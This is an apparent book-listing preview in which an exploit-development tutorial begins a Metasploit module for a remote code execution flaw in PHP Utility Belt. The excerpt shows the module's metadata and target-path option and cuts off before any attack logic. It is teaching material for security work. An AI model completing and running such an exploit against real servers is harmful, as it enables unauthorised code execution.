June 2019
Beginner to intermediate
660 pages
14h 30m
English
Let's write the exploit for the PHP utility belt remote code execution vulnerability in Metasploit as follows:
class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Utility Belt Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in PHP Utility Belt }, 'Author' => [ 'Nipun Jaswal', ], 'DisclosureDate' => 'May 16 2015', 'Platform' => 'php', 'Payload' => { 'Space' => 2000, 'DisableNops' => true }, 'Targets' => [ ['PHP Utility Belt', {}] ], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']), ...Read now
Unlock full access